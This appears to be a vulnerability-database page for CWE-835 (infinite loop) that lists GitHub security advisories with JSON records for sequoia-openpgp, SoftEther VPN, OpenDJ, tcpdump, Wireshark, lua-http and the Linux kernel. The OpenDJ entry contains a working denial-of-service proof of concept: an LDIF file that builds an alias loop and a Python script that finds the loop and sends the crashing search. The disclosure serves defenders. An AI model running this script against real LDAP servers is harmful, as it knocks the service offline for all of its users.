CWE-835
AllowedLoop with Unreachable Exit Condition ('Infinite Loop')
Abstraction: Base · Status: Incomplete
The product contains an iteration or loop with an exit condition that cannot be reached, i.e., an infinite loop.
1060 vulnerabilities reference this CWE, most recent first.
GHSA-9344-P847-QM5C
Vulnerability from github – Published: 2024-06-26 19:10 – Updated: 2025-07-28 15:38There is a denial-of-service vulnerability in sequoia-openpgp, our crate providing a low-level interface to our OpenPGP implementation. When triggered, the process will enter an infinite loop.
Many thanks to Andrew Gallagher for disclosing the issue to us.
Impact
Any software directly or indirectly using the interface sequoia_openpgp::cert::raw::RawCertParser. Notably, this includes all
software using the sequoia_cert_store crate.
Details
The RawCertParser does not advance the input stream when encountering unsupported cert (primary key) versions, resulting in an infinite loop.
The fix introduces a new raw-cert-specific cert::raw::Error::UnuspportedCert.
Affected software
- sequoia-openpgp 1.13.0
- sequoia-openpgp 1.14.0
- sequoia-openpgp 1.15.0
- sequoia-openpgp 1.16.0
- sequoia-openpgp 1.17.0
- sequoia-openpgp 1.18.0
- sequoia-openpgp 1.19.0
- sequoia-openpgp 1.20.0
- Any software built against a vulnerable version of sequoia-openpgp which is directly or indirectly using the interface sequoia_
openpgp::cert::raw::RawCertParser. Notably, this includes all software using thesequoia_cert_storecrate.
{
"affected": [
{
"package": {
"ecosystem": "crates.io",
"name": "sequoia-openpgp"
},
"ranges": [
{
"events": [
{
"introduced": "1.13.0"
},
{
"fixed": "1.21.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-58261"
],
"database_specific": {
"cwe_ids": [
"CWE-835"
],
"github_reviewed": true,
"github_reviewed_at": "2024-06-26T19:10:15Z",
"nvd_published_at": null,
"severity": "LOW"
},
"details": "There is a denial-of-service vulnerability in sequoia-openpgp, our crate providing a low-level interface to our OpenPGP implementation. When triggered, the process will enter an infinite loop.\n\nMany thanks to Andrew Gallagher for disclosing the issue to us.\n\n## Impact\n\nAny software directly or indirectly using the interface `sequoia_openpgp::cert::raw::RawCertParser`. Notably, this includes all\nsoftware using the `sequoia_cert_store` crate.\n\n## Details\n\nThe `RawCertParser` does not advance the input stream when encountering unsupported cert (primary key) versions, resulting in an infinite loop.\n\nThe fix introduces a new raw-cert-specific `cert::raw::Error::UnuspportedCert`.\n\n## Affected software\n\n- sequoia-openpgp 1.13.0\n- sequoia-openpgp 1.14.0\n- sequoia-openpgp 1.15.0\n- sequoia-openpgp 1.16.0\n- sequoia-openpgp 1.17.0\n- sequoia-openpgp 1.18.0\n- sequoia-openpgp 1.19.0\n- sequoia-openpgp 1.20.0\n- Any software built against a vulnerable version of sequoia-openpgp which is directly or indirectly using the interface sequoia_`openpgp::cert::raw::RawCertParser`. Notably, this includes all software using the `sequoia_cert_store` crate.",
"id": "GHSA-9344-p847-qm5c",
"modified": "2025-07-28T15:38:06Z",
"published": "2024-06-26T19:10:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-58261"
},
{
"type": "PACKAGE",
"url": "https://gitlab.com/sequoia-pgp/sequoia"
},
{
"type": "WEB",
"url": "https://gitlab.com/sequoia-pgp/sequoia/-/issues/1106"
},
{
"type": "WEB",
"url": "https://rustsec.org/advisories/RUSTSEC-2024-0345.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "Low severity (DoS) vulnerability in sequoia-openpgp"
}
GHSA-93JH-7V3Q-C8C6
Vulnerability from github – Published: 2023-10-12 18:30 – Updated: 2024-04-04 08:35A denial of service vulnerability exists in the DCRegister DDNS_RPC_MAX_RECV_SIZE functionality of SoftEther VPN 4.41-9782-beta, 5.01.9674 and 5.02. A specially crafted network packet can lead to denial of service. An attacker can perform a man-in-the-middle attack to trigger this vulnerability.
{
"affected": [],
"aliases": [
"CVE-2023-22325"
],
"database_specific": {
"cwe_ids": [
"CWE-835"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-10-12T16:15:10Z",
"severity": "MODERATE"
},
"details": "A denial of service vulnerability exists in the DCRegister DDNS_RPC_MAX_RECV_SIZE functionality of SoftEther VPN 4.41-9782-beta, 5.01.9674 and 5.02. A specially crafted network packet can lead to denial of service. An attacker can perform a man-in-the-middle attack to trigger this vulnerability.",
"id": "GHSA-93jh-7v3q-c8c6",
"modified": "2024-04-04T08:35:44Z",
"published": "2023-10-12T18:30:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-22325"
},
{
"type": "WEB",
"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1736"
},
{
"type": "WEB",
"url": "https://www.softether.org/9-about/News/904-SEVPN202301"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-93QR-H8PR-4593
Vulnerability from github – Published: 2025-03-05 18:33 – Updated: 2025-03-05 18:33Summary
A denial-of-service (DoS) vulnerability in OpenDJ has been discovered that causes the server to become unresponsive to all LDAP requests without crashing or restarting. This issue occurs when an alias loop exists in the LDAP database. If an ldapsearch request is executed with alias dereferencing set to "always" on this alias entry, the server stops responding to all future requests.
I have confirmed this issue using the latest OpenDJ version (9.2), both with the official OpenDJ Docker image and a local OpenDJ server running on my Windows 10 machine.
Details
An unauthenticated attacker can exploit this vulnerability using a single crafted ldapsearch request. Fortunately, the server can be restarted without data corruption. While this attack requires the existence of an alias loop, I am uncertain whether such loops can be easily created in specific environments or if the method can be adapted to execute other DoS attacks more easily.
PoC (Steps to Reproduce)
- Set up an OpenDJ server instance as usual, using the base DN
dc=example,dc=com - Import the attached
example_data_alias_dos.ldiffile into the LDAP database - Ensure that the
ldap3Python library is installed (pip install ldap3) - Run the attached Python script
python opendj_alias_dos.py, which searches for alias loops and executes the DoS attack - After executing the script, the server will stop responding to requests until it is restarted
Impact
This vulnerability directly affects server availability for everyone using it. A single ldapsearch request on an alias loop entry can cause the entire server to become unresponsive, requiring a restart. The issue can be repeatedly triggered. The following response message is displayed on following requests:
result: 80 Other (e.g., implementation specific) error
text: com.sleepycat.je.EnvironmentFailureException: (JE 18.3.12) JAVA_ERROR: Java Error occurred, recovery may not be possible.
example_data_alias_dos.ldif
dn: dc=example,dc=com
objectClass: top
objectClass: domain
dc: example
dn: ou=people,dc=example,dc=com
objectClass: top
objectClass: organizationalUnit
ou: people
description: All users
dn: ou=students,ou=people,dc=example,dc=com
objectClass: top
objectClass: organizationalUnit
ou: students
description: All students
dn: uid=jd123,ou=students,ou=people,dc=example,dc=com
objectClass: top
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
mail: jd123@example.com
sn: Doe
cn: John Doe
givenName: John
uid: jd123
dn: ou=employees,ou=people,dc=example,dc=com
objectClass: top
objectClass: organizationalUnit
ou: employees
description: All employees
dn: uid=jd123,ou=employees,ou=people,dc=example,dc=com
objectClass: alias
objectClass: top
objectClass: extensibleObject
aliasedObjectName: uid=jd123,ou=researchers,ou=people,dc=example,dc=com
uid: jd123
dn: ou=researchers,ou=people,dc=example,dc=com
objectClass: top
objectClass: organizationalUnit
ou: researchers
description: All reasearchers
dn: uid=jd123,ou=researchers,ou=people,dc=example,dc=com
objectClass: alias
objectClass: top
objectClass: extensibleObject
aliasedObjectName: uid=jd123,ou=employees,ou=people,dc=example,dc=com
uid: jd123
opendj_alias_dos.py
import argparse
from ldap3 import Server, Connection, ALL, DEREF_NEVER, DEREF_ALWAYS
from ldap3.core.exceptions import LDAPBindError, LDAPSocketOpenError
def connect_to_ldap(ip, port):
try:
server = Server(ip, port, get_info=ALL)
connection = Connection(server, auto_bind=True)
return connection
except (LDAPBindError, LDAPSocketOpenError) as e:
print(f"Error connecting to LDAP server: {e}")
return None
def find_aliases(connection, base_dn):
try:
search_filter = "(objectClass=alias)"
connection.search(base_dn, search_filter=search_filter, dereference_aliases=DEREF_NEVER, attributes=["*"])
except Exception as e:
print(f"Error during search: {e}")
aliases = {}
for entry in connection.entries:
entry_dn = entry.entry_dn
entry_alias = entry.aliasedObjectName.value
aliases[entry_dn] = entry_alias
return aliases
def detect_alias_loop(aliases):
visited = set()
path = set()
def dfs(alias):
if alias in path:
return alias
if alias in visited:
return None
path.add(alias)
visited.add(alias)
aliased_target = aliases.get(alias)
if aliased_target:
result = dfs(aliased_target)
if result:
return result
path.remove(alias)
return None
for alias in aliases:
if alias not in visited:
loop_alias = dfs(alias)
if loop_alias:
return loop_alias
return None
def execute_dos_search(connection, looping_alias_dn):
try:
search_filter = "(objectClass=*)"
connection.search(looping_alias_dn, search_filter=search_filter, dereference_aliases=DEREF_ALWAYS)
except Exception as e:
print(f"Error during search: {e}")
for entry in connection.entries:
entry_dn = entry.entry_dn
print(entry_dn)
def main():
parser = argparse.ArgumentParser(description="Search LDAP for circular alias references.")
parser.add_argument("ip", type=str, nargs="?", default=None, help="The IP address of the LDAP server.")
parser.add_argument("port", type=int, nargs="?", default=None, help="The port of the LDAP server.")
parser.add_argument("base", type=str, nargs="?", default=None, help="The base DN of the LDAP server.")
args = parser.parse_args()
if not args.ip:
args.ip = input("Please enter the IP address of the LDAP server: ")
if not args.port:
while True:
try:
port_input = input("Please enter the port of the LDAP server: ")
args.port = int(port_input)
break
except ValueError:
print("Invalid input. Please enter a valid integer for the port.")
if not args.base:
args.base = input("Please enter the base DN of the LDAP server: ")
connection = connect_to_ldap(args.ip, args.port)
if connection:
aliases = find_aliases(connection, args.base)
looping_alias_dn = detect_alias_loop(aliases)
if looping_alias_dn:
execute_dos_search(connection, looping_alias_dn)
print(f"DOS executed with alias: {looping_alias_dn}")
else:
print("No looping alias DN found!")
connection.unbind()
if __name__ == "__main__":
main()
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.openidentityplatform.opendj:opendj-server-legacy"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.9.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-27497"
],
"database_specific": {
"cwe_ids": [
"CWE-835"
],
"github_reviewed": true,
"github_reviewed_at": "2025-03-05T18:33:30Z",
"nvd_published_at": "2025-03-05T16:15:40Z",
"severity": "HIGH"
},
"details": "### Summary\nA denial-of-service (DoS) vulnerability in OpenDJ has been discovered that causes the server to become unresponsive to all LDAP requests without crashing or restarting. This issue occurs when an alias loop exists in the LDAP database. If an `ldapsearch` request is executed with alias dereferencing set to \"always\" on this alias entry, the server stops responding to all future requests.\nI have confirmed this issue using the latest OpenDJ version (9.2), both with the official OpenDJ Docker image and a local OpenDJ server running on my Windows 10 machine.\n\n### Details\nAn unauthenticated attacker can exploit this vulnerability using a single crafted `ldapsearch` request. Fortunately, the server can be restarted without data corruption. While this attack requires the existence of an alias loop, I am uncertain whether such loops can be easily created in specific environments or if the method can be adapted to execute other DoS attacks more easily.\n\n### PoC (Steps to Reproduce)\n1. Set up an OpenDJ server instance as usual, using the base DN `dc=example,dc=com`\n2. Import the attached `example_data_alias_dos.ldif` file into the LDAP database\n3. Ensure that the `ldap3` Python library is installed (`pip install ldap3`)\n4. Run the attached Python script `python opendj_alias_dos.py`, which searches for alias loops and executes the DoS attack\n5. After executing the script, the server will stop responding to requests until it is restarted\n\n### Impact\nThis vulnerability directly affects server availability for everyone using it. A single `ldapsearch` request on an alias loop entry can cause the entire server to become unresponsive, requiring a restart. The issue can be repeatedly triggered. The following response message is displayed on following requests:\n```\nresult: 80 Other (e.g., implementation specific) error\ntext: com.sleepycat.je.EnvironmentFailureException: (JE 18.3.12) JAVA_ERROR: Java Error occurred, recovery may not be possible.\n```\n\n**example_data_alias_dos.ldif**\n```\ndn: dc=example,dc=com\nobjectClass: top\nobjectClass: domain\ndc: example\n\ndn: ou=people,dc=example,dc=com\nobjectClass: top\nobjectClass: organizationalUnit\nou: people\ndescription: All users\n\ndn: ou=students,ou=people,dc=example,dc=com\nobjectClass: top\nobjectClass: organizationalUnit\nou: students\ndescription: All students\n\ndn: uid=jd123,ou=students,ou=people,dc=example,dc=com\nobjectClass: top\nobjectClass: inetOrgPerson\nobjectClass: organizationalPerson\nobjectClass: person\nmail: jd123@example.com\nsn: Doe\ncn: John Doe\ngivenName: John\nuid: jd123\n\ndn: ou=employees,ou=people,dc=example,dc=com\nobjectClass: top\nobjectClass: organizationalUnit\nou: employees\ndescription: All employees\n\ndn: uid=jd123,ou=employees,ou=people,dc=example,dc=com\nobjectClass: alias\nobjectClass: top\nobjectClass: extensibleObject\naliasedObjectName: uid=jd123,ou=researchers,ou=people,dc=example,dc=com\nuid: jd123\n\ndn: ou=researchers,ou=people,dc=example,dc=com\nobjectClass: top\nobjectClass: organizationalUnit\nou: researchers\ndescription: All reasearchers\n\ndn: uid=jd123,ou=researchers,ou=people,dc=example,dc=com\nobjectClass: alias\nobjectClass: top\nobjectClass: extensibleObject\naliasedObjectName: uid=jd123,ou=employees,ou=people,dc=example,dc=com\nuid: jd123\n```\n\n**opendj_alias_dos.py**\n```Python\nimport argparse\n\nfrom ldap3 import Server, Connection, ALL, DEREF_NEVER, DEREF_ALWAYS\nfrom ldap3.core.exceptions import LDAPBindError, LDAPSocketOpenError\n\n\ndef connect_to_ldap(ip, port):\n try:\n server = Server(ip, port, get_info=ALL)\n connection = Connection(server, auto_bind=True)\n return connection\n except (LDAPBindError, LDAPSocketOpenError) as e:\n print(f\"Error connecting to LDAP server: {e}\")\n return None\n\n\ndef find_aliases(connection, base_dn):\n try:\n search_filter = \"(objectClass=alias)\"\n connection.search(base_dn, search_filter=search_filter, dereference_aliases=DEREF_NEVER, attributes=[\"*\"])\n except Exception as e:\n print(f\"Error during search: {e}\")\n\n aliases = {}\n for entry in connection.entries:\n entry_dn = entry.entry_dn\n entry_alias = entry.aliasedObjectName.value\n aliases[entry_dn] = entry_alias\n\n return aliases\n\n\ndef detect_alias_loop(aliases):\n visited = set()\n path = set()\n\n def dfs(alias):\n if alias in path:\n return alias\n if alias in visited:\n return None\n\n path.add(alias)\n visited.add(alias)\n\n aliased_target = aliases.get(alias)\n if aliased_target:\n result = dfs(aliased_target)\n if result:\n return result\n\n path.remove(alias)\n return None\n\n for alias in aliases:\n if alias not in visited:\n loop_alias = dfs(alias)\n if loop_alias:\n return loop_alias\n\n return None\n\n\ndef execute_dos_search(connection, looping_alias_dn):\n try:\n search_filter = \"(objectClass=*)\"\n connection.search(looping_alias_dn, search_filter=search_filter, dereference_aliases=DEREF_ALWAYS)\n except Exception as e:\n print(f\"Error during search: {e}\")\n\n for entry in connection.entries:\n entry_dn = entry.entry_dn\n print(entry_dn)\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Search LDAP for circular alias references.\")\n parser.add_argument(\"ip\", type=str, nargs=\"?\", default=None, help=\"The IP address of the LDAP server.\")\n parser.add_argument(\"port\", type=int, nargs=\"?\", default=None, help=\"The port of the LDAP server.\")\n parser.add_argument(\"base\", type=str, nargs=\"?\", default=None, help=\"The base DN of the LDAP server.\")\n args = parser.parse_args()\n\n if not args.ip:\n args.ip = input(\"Please enter the IP address of the LDAP server: \")\n\n if not args.port:\n while True:\n try:\n port_input = input(\"Please enter the port of the LDAP server: \")\n args.port = int(port_input)\n break\n except ValueError:\n print(\"Invalid input. Please enter a valid integer for the port.\")\n\n if not args.base:\n args.base = input(\"Please enter the base DN of the LDAP server: \")\n\n connection = connect_to_ldap(args.ip, args.port)\n if connection:\n aliases = find_aliases(connection, args.base)\n looping_alias_dn = detect_alias_loop(aliases)\n if looping_alias_dn:\n execute_dos_search(connection, looping_alias_dn)\n print(f\"DOS executed with alias: {looping_alias_dn}\")\n else:\n print(\"No looping alias DN found!\")\n connection.unbind()\n\n\nif __name__ == \"__main__\":\n main()\n```",
"id": "GHSA-93qr-h8pr-4593",
"modified": "2025-03-05T18:33:30Z",
"published": "2025-03-05T18:33:30Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/OpenIdentityPlatform/OpenDJ/security/advisories/GHSA-93qr-h8pr-4593"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27497"
},
{
"type": "WEB",
"url": "https://github.com/OpenIdentityPlatform/OpenDJ/commit/08aee4724608e4a32baa3c7d7499ec913a275aaf"
},
{
"type": "PACKAGE",
"url": "https://github.com/OpenIdentityPlatform/OpenDJ"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "OpenDJ Denial of Service (DoS) using alias loop"
}
GHSA-93V5-72QM-H77Q
Vulnerability from github – Published: 2022-05-13 01:42 – Updated: 2022-05-13 01:42The RESP parser in tcpdump before 4.9.2 could enter an infinite loop due to a bug in print-resp.c:resp_get_length().
{
"affected": [],
"aliases": [
"CVE-2017-12989"
],
"database_specific": {
"cwe_ids": [
"CWE-835"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-09-14T06:29:00Z",
"severity": "HIGH"
},
"details": "The RESP parser in tcpdump before 4.9.2 could enter an infinite loop due to a bug in print-resp.c:resp_get_length().",
"id": "GHSA-93v5-72qm-h77q",
"modified": "2022-05-13T01:42:51Z",
"published": "2022-05-13T01:42:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-12989"
},
{
"type": "WEB",
"url": "https://github.com/the-tcpdump-group/tcpdump/commit/db24063b01cba8e9d4d88b7d8ac70c9000c104e4"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHEA-2018:0705"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/201709-23"
},
{
"type": "WEB",
"url": "https://support.apple.com/HT208221"
},
{
"type": "WEB",
"url": "http://www.debian.org/security/2017/dsa-3971"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1039307"
},
{
"type": "WEB",
"url": "http://www.tcpdump.org/tcpdump-changes.txt"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-947G-GMVH-R5RP
Vulnerability from github – Published: 2023-09-05 09:30 – Updated: 2025-03-14 18:30Improper Handling of Exceptional Conditions vulnerability in Daurnimator HTTP Library for Lua allows Excessive Allocation.This issue affects HTTP Library for Lua: before commit ddab283.
{
"affected": [],
"aliases": [
"CVE-2023-4540"
],
"database_specific": {
"cwe_ids": [
"CWE-755",
"CWE-835"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-09-05T08:15:40Z",
"severity": "HIGH"
},
"details": "Improper Handling of Exceptional Conditions vulnerability in Daurnimator HTTP Library for Lua allows Excessive Allocation.This issue affects HTTP Library for Lua: before commit ddab283.",
"id": "GHSA-947g-gmvh-r5rp",
"modified": "2025-03-14T18:30:38Z",
"published": "2023-09-05T09:30:21Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4540"
},
{
"type": "WEB",
"url": "https://github.com/daurnimator/lua-http/commit/ddab2835c583d45dec62680ca8d3cbde55e0bae6"
},
{
"type": "WEB",
"url": "https://cert.pl/en/posts/2023/09/CVE-2023-4540"
},
{
"type": "WEB",
"url": "https://cert.pl/posts/2023/09/CVE-2023-4540"
},
{
"type": "WEB",
"url": "https://https://cert.pl/en/posts/2023/09/CVE-2023-4540"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-94RJ-CGWH-P385
Vulnerability from github – Published: 2022-05-13 01:21 – Updated: 2022-05-13 01:21In Wireshark 3.0.0, the Rbm dissector could go into an infinite loop. This was addressed in epan/dissectors/file-rbm.c by handling unknown object types safely.
{
"affected": [],
"aliases": [
"CVE-2019-10900"
],
"database_specific": {
"cwe_ids": [
"CWE-835"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-04-09T04:29:00Z",
"severity": "HIGH"
},
"details": "In Wireshark 3.0.0, the Rbm dissector could go into an infinite loop. This was addressed in epan/dissectors/file-rbm.c by handling unknown object types safely.",
"id": "GHSA-94rj-cgwh-p385",
"modified": "2022-05-13T01:21:56Z",
"published": "2022-05-13T01:21:56Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10900"
},
{
"type": "WEB",
"url": "https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=15612"
},
{
"type": "WEB",
"url": "https://code.wireshark.org/review/gitweb?p=wireshark.git;a=commit;h=26eee01f57f0a86fb375892c7937eac24ede4610"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4LYIOOQIMFQ3PA7AFBK4DNXHISTEYUC5"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PU3QA2DUO3XS24QE24CQRP4A4XQQY76R"
},
{
"type": "WEB",
"url": "https://www.wireshark.org/security/wnpa-sec-2019-13.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00027.html"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/107836"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-95JJ-PJW6-Q9FR
Vulnerability from github – Published: 2024-05-21 15:31 – Updated: 2024-11-01 21:31In the Linux kernel, the following vulnerability has been resolved:
ext4: add error checking to ext4_ext_replay_set_iblocks()
If the call to ext4_map_blocks() fails due to an corrupted file system, ext4_ext_replay_set_iblocks() can get stuck in an infinite loop. This could be reproduced by running generic/526 with a file system that has inline_data and fast_commit enabled. The system will repeatedly log to the console:
EXT4-fs warning (device dm-3): ext4_block_to_path:105: block 1074800922 > max in inode 131076
and the stack that it gets stuck in is:
ext4_block_to_path+0xe3/0x130 ext4_ind_map_blocks+0x93/0x690 ext4_map_blocks+0x100/0x660 skip_hole+0x47/0x70 ext4_ext_replay_set_iblocks+0x223/0x440 ext4_fc_replay_inode+0x29e/0x3b0 ext4_fc_replay+0x278/0x550 do_one_pass+0x646/0xc10 jbd2_journal_recover+0x14a/0x270 jbd2_journal_load+0xc4/0x150 ext4_load_journal+0x1f3/0x490 ext4_fill_super+0x22d4/0x2c00
With this patch, generic/526 still fails, but system is no longer locking up in a tight loop. It's likely the root casue is that fast_commit replay is corrupting file systems with inline_data, and we probably need to add better error handling in the fast commit replay code path beyond what is done here, which essentially just breaks the infinite loop without reporting the to the higher levels of the code.
{
"affected": [],
"aliases": [
"CVE-2021-47406"
],
"database_specific": {
"cwe_ids": [
"CWE-835"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-05-21T15:15:26Z",
"severity": "MODERATE"
},
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: add error checking to ext4_ext_replay_set_iblocks()\n\nIf the call to ext4_map_blocks() fails due to an corrupted file\nsystem, ext4_ext_replay_set_iblocks() can get stuck in an infinite\nloop. This could be reproduced by running generic/526 with a file\nsystem that has inline_data and fast_commit enabled. The system will\nrepeatedly log to the console:\n\nEXT4-fs warning (device dm-3): ext4_block_to_path:105: block 1074800922 \u003e max in inode 131076\n\nand the stack that it gets stuck in is:\n\n ext4_block_to_path+0xe3/0x130\n ext4_ind_map_blocks+0x93/0x690\n ext4_map_blocks+0x100/0x660\n skip_hole+0x47/0x70\n ext4_ext_replay_set_iblocks+0x223/0x440\n ext4_fc_replay_inode+0x29e/0x3b0\n ext4_fc_replay+0x278/0x550\n do_one_pass+0x646/0xc10\n jbd2_journal_recover+0x14a/0x270\n jbd2_journal_load+0xc4/0x150\n ext4_load_journal+0x1f3/0x490\n ext4_fill_super+0x22d4/0x2c00\n\nWith this patch, generic/526 still fails, but system is no longer\nlocking up in a tight loop. It\u0027s likely the root casue is that\nfast_commit replay is corrupting file systems with inline_data, and we\nprobably need to add better error handling in the fast commit replay\ncode path beyond what is done here, which essentially just breaks the\ninfinite loop without reporting the to the higher levels of the code.",
"id": "GHSA-95jj-pjw6-q9fr",
"modified": "2024-11-01T21:31:46Z",
"published": "2024-05-21T15:31:44Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-47406"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/1fd95c05d8f742abfe906620780aee4dbe1a2db0"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/27e10c5d31ff1d222c7f797f1ee96d422859ba67"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/a63474dbf692dd09b50fed592bc41f6de5f102fc"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-95RC-29J2-Q3VR
Vulnerability from github – Published: 2024-04-04 09:30 – Updated: 2025-03-18 18:30In the Linux kernel, the following vulnerability has been resolved:
af_unix: Fix task hung while purging oob_skb in GC.
syzbot reported a task hung; at the same time, GC was looping infinitely in list_for_each_entry_safe() for OOB skb. [0]
syzbot demonstrated that the list_for_each_entry_safe() was not actually safe in this case.
A single skb could have references for multiple sockets. If we free such a skb in the list_for_each_entry_safe(), the current and next sockets could be unlinked in a single iteration.
unix_notinflight() uses list_del_init() to unlink the socket, so the prefetched next socket forms a loop itself and list_for_each_entry_safe() never stops.
Here, we must use while() and make sure we always fetch the first socket.
[0]: Sending NMI from CPU 0 to CPUs 1: NMI backtrace for cpu 1 CPU: 1 PID: 5065 Comm: syz-executor236 Not tainted 6.8.0-rc3-syzkaller-00136-g1f719a2f3fa6 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/25/2024 RIP: 0010:preempt_count arch/x86/include/asm/preempt.h:26 [inline] RIP: 0010:check_kcov_mode kernel/kcov.c:173 [inline] RIP: 0010:__sanitizer_cov_trace_pc+0xd/0x60 kernel/kcov.c:207 Code: cc cc cc cc 66 0f 1f 84 00 00 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f 1e fa 65 48 8b 14 25 40 c2 03 00 <65> 8b 05 b4 7c 78 7e a9 00 01 ff 00 48 8b 34 24 74 0f f6 c4 01 74 RSP: 0018:ffffc900033efa58 EFLAGS: 00000283 RAX: ffff88807b077800 RBX: ffff88807b077800 RCX: 1ffffffff27b1189 RDX: ffff88802a5a3b80 RSI: ffffffff8968488d RDI: ffff88807b077f70 RBP: ffffc900033efbb0 R08: 0000000000000001 R09: fffffbfff27a900c R10: ffffffff93d48067 R11: ffffffff8ae000eb R12: ffff88807b077800 R13: dffffc0000000000 R14: ffff88807b077e40 R15: 0000000000000001 FS: 0000000000000000(0000) GS:ffff8880b9500000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000564f4fc1e3a8 CR3: 000000000d57a000 CR4: 00000000003506f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: unix_gc+0x563/0x13b0 net/unix/garbage.c:319 unix_release_sock+0xa93/0xf80 net/unix/af_unix.c:683 unix_release+0x91/0xf0 net/unix/af_unix.c:1064 __sock_release+0xb0/0x270 net/socket.c:659 sock_close+0x1c/0x30 net/socket.c:1421 __fput+0x270/0xb80 fs/file_table.c:376 task_work_run+0x14f/0x250 kernel/task_work.c:180 exit_task_work include/linux/task_work.h:38 [inline] do_exit+0xa8a/0x2ad0 kernel/exit.c:871 do_group_exit+0xd4/0x2a0 kernel/exit.c:1020 __do_sys_exit_group kernel/exit.c:1031 [inline] __se_sys_exit_group kernel/exit.c:1029 [inline] __x64_sys_exit_group+0x3e/0x50 kernel/exit.c:1029 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xd5/0x270 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x6f/0x77 RIP: 0033:0x7f9d6cbdac09 Code: Unable to access opcode bytes at 0x7f9d6cbdabdf. RSP: 002b:00007fff5952feb8 EFLAGS: 00000246 ORIG_RAX: 00000000000000e7 RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f9d6cbdac09 RDX: 000000000000003c RSI: 00000000000000e7 RDI: 0000000000000000 RBP: 00007f9d6cc552b0 R08: ffffffffffffffb8 R09: 0000000000000006 R10: 0000000000000006 R11: 0000000000000246 R12: 00007f9d6cc552b0 R13: 0000000000000000 R14: 00007f9d6cc55d00 R15: 00007f9d6cbabe70
{
"affected": [],
"aliases": [
"CVE-2024-26780"
],
"database_specific": {
"cwe_ids": [
"CWE-835"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-04-04T09:15:07Z",
"severity": "MODERATE"
},
